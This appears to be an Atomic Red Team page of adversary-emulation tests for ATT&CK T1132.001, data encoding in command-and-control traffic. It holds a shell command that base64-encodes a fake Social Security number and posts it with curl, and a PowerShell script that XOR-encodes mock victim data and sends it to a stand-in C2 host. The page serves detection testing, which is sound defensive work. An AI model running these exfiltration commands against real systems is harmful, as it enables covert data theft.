T1132.001
Data Encoding: Standard Encoding
Description from ATT&CK
Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.
Atomic Tests
Atomic Test #1 - Base64 Encoded data.
Utilizing a common technique for posting base64 encoded data.
Supported Platforms: macos,linux
auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
destination_url | Destination URL to post encoded data. | url | redcanary.com |
base64_data | Encoded data to post using fake Social Security number 111-11-1111. | string | MTExLTExLTExMTE= |
Attack Commands: Run with sh!
1
2
3
echo -n 111-11-1111 | base64
curl -XPOST #{base64_data}.#{destination_url}
Atomic Test #2 - XOR Encoded data.
XOR encodes the data with a XOR key. Reference - https://gist.github.com/loadenmb/8254cee0f0287b896a05dcdc8a30042f
Supported Platforms: windows
auto_generated_guid: c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
destination_url | Destination URL to post encoded data. | url | example.com |
plaintext | Plain text mimicking victim data sent to C2 server. | string | Path\n—-\nC:\Users\victim |
key | XOR key used for encoding the plaintext. | string | abcdefghijklmnopqrstuvwxyz123456 |
Attack Commands: Run with powershell!
1
2
3
4
5
6
7
8
9
10
$plaintext = ([system.Text.Encoding]::UTF8.getBytes("#{plaintext}"))
$key = "#{key}"
$cyphertext = @();
for ($i = 0; $i -lt $plaintext.Count; $i++) {
$cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length];
}
$cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext)
[System.Net.ServicePointManager]::Expect100Continue = $false
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $cyphertext -DisableKeepAlive